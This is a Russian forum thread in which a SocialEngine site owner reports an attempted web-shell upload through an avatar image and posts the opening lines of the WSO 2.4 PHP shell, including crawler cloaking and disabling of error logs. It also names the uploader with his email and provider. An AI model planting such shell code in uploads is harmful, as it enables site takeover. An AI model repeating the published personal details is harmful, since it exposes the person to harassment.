1. Мы продолжаем публиковать интересные статьи на тему SocialEngine 4. Одна из статей посвящена правильному выбору сервера для вашей социальной сети, а другая содержит советы по увеличению производительности платформы. Также мы добавили большую статью о пользовательских уровнях. Ознакомиться со статьями вы можете в разделе Вопросы и Ответы SocialEngine 4.
  2. Вам кажется, что ваша версия SocialEngine 4, работает медленно?

    Голосуйте. Пишите свою версию системы, железо на чем работает и количество пользователей. Будем увеличивать производительность :-) Подробнее

  3. В связи с участившимися случаями попыток продажи пользователями форума различных "сборок" коммерческих социальных платформ, обычно основанных на SocialEngine 3, вводится новое правило для форума. Запрещается создание тем или размещение в уже созданных предложений о продаже или размещение ссылок на сайты, где происходит продажа "сборок". Пользователи, которые продолжат свою коммерческую деятельность в данном направлении, будут заблокированы. Подробнее.

RabbeN (заливщик шеллов!)ВНИМАНИЕ!

Discussion in 'Отзывы о пользователях' started by galstuk, Dec 1, 2010.

  1. galstuk Thread starter Famous member


    Offline
    • Знаменитый
    Message Count:
    398
    Likes Received:
    151
    Внимание всем! Будьте бдительны!
    Только что один из моих скриптов выловил на моем сайте заливщика шеллов.
    Им оказался Rabben
    IP: ****
    Email: RabbeN[]tut.by
    Провайдер: BELTELECOM
    Расположение: *****
    ВКонтакте:http://vkontakte.ru/****

    Данный господин пытался залить шелл через аватару,а именно,поместив вредоносный код в изображение с аватарой.

    Выкладываю часть вредоносного кода,который находился в аватаре:

    Code:
    $auth_pass = "63a9f0ea7bb98050796b649e85481845";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    
    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    
    @session_start();
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.4');

    Данное действие можно расценить как потенциальный взлом сайта и передать данные в соответствующие органы.

    БУДЬТЕ БДИТЕЛЬНЫ!
  2. RabbeN User


    Offline
    Message Count:
    38
    Likes Received:
    13
    Пытался, но не смог ;)
  3. galstuk Thread starter Famous member


    Offline
    • Знаменитый
    Message Count:
    398
    Likes Received:
    151
    Мне не важно,смог ты или нет. Но сам факт имел место быть.Благо что у меня стоит защита от этого и скрипт автоматического распознования шеллов. Нет никакой уверенности,что от твоих таких деяний не пострадают сайты новичков,которые еще неуверенно себя чувствуют в программировании.
    Так что всем остальным советую добавить IP **** в список нечести. :)
    Lycon likes this.
  4. Media CMS User


    Offline
    Message Count:
    127
    Likes Received:
    1
    чего с ним парится то?
    таких как он прудь пруди в сети
    данный типаж безработных мне знаком, который что ни есть в поисках навредить от безделья (и тоже не в силах)
    1 - грепануть его тут по фаерволу
    2 - найти его аккаунт на фрилансе и написать администрации, или оставить ему заявочку в арбитраже , пусть видят что данный чел мошенник!
  5. RabbeN User


    Offline
    Message Count:
    38
    Likes Received:
    13
    1. На фрилансе не тусуюсь(сам не программист, больше подхожу под тестера)
    2. Ни одному порталу еще не навредил. Да, 1 портал попался, на этот баг, но администратору уведомил про баг.
    3. Смысл банить по ip, если есть тьма аномайзеров?
    4. Я невыкидываю баг в паблик...
  6. galstuk Thread starter Famous member


    Offline
    • Знаменитый
    Message Count:
    398
    Likes Received:
    151
    Во первых начнем с того,что это не баг. Это просто обычное переименование php-файла в jpg и соответсвенно загрузка этой самой jpg в аватару. Могу сказать только одно: Что таким образом переименованый файл ты никогда не запустишь на сервере без определенных знаний.В сущности,любой php файл можно переименовать в jpg и загружать на любой сайт.Вопрос в том,будет ли это работать. Но меня просто удивило то, что всякие школьники,начитавшись Античата,так и наровят себя возомнить КулХацкерами, при этом не имея за спиной профессиональных знаний хотя бы даже того самого php и совершенно не имея представления о том, какие директивы и защита стоят на сервере, а также,что самое главное, совершенно не имея представления НА КОГО ОНИ МОГУТ НАРВАТЬСЯ!!! На этом форуме были уже такие случаи и многие помнят... :)
    Так что мой тебе совет, вместо того чтоб херней страдать,лучше бы делом занимался и учил программирование.

    Еще раз убеждаюсь в том,что ты просто делитант. В наше время можно и через прокси вход закрыть... :)
  7. Media CMS User


    Offline
    Message Count:
    127
    Likes Received:
    1
    бета тестер из тебя тоже хреновый!
    аномайзер - затруднит твою беспонтовые похождения на проектах где ты забаненн
    ты баг и не нашел, так что не льсти себе!
  8. galstuk Thread starter Famous member


    Offline
    • Знаменитый
    Message Count:
    398
    Likes Received:
    151
    Совершенно справидливо.

    В точности также как и :


    Неужели??? Каким образом и где ты меня уведомил??? Как только ты зарегился и вошел на сайт, имея заместо аватарки вредоносный код, то тебя скрипт автоматом сразу и забанил, о чем я получил уведомление о загрузки вредоносного кода.

    Ладно, просто в будущем подумай, стоит ли кому-нибудь такие гадости делать. Иначе для тебя самого же это может боком выйти.
  9. RabbeN User


    Offline
    Message Count:
    38
    Likes Received:
    13
    Я и не спорю :)
    Затруднит, но не намного.
    Как скажешь, бро.

    Я не писал, что я тебе уведомлял. На твоём сайте он даже не сработал.

    По каким критериям, ты выяснил, что я тебе гадости делал?
  10. SpartakuS User


    Offline
    • Знаменитый
    Message Count:
    797
    Likes Received:
    82
    Думайте головой перед тем как выкладывать чьи то данные (от айпи до котакта или телефона).
    Вышеуказанный юзер ничего плохого сайту не сделал (и не факт, что сделал бы). А может и решил потратить свое свободное время на то, чтобы проверить ваши мегапорталы на уязвимости и в случае обнаружения сообщить незадачливым админам.
    Я кстати так тоже зачастую делаю. Правда в основном на сайтах клиентов или местной деме когда она была. Случайно вижу код, в котором можно найти уязвимость. Захожу на чей то сайт. И проверяю. Правда не находил ни разу.
    А вы по сути выкладываете контакты человека за то, что он не сделал ничего плохого и вам кажется, что он собирался это делать.

Share This Page

All rights reserved SocEngine.ru ©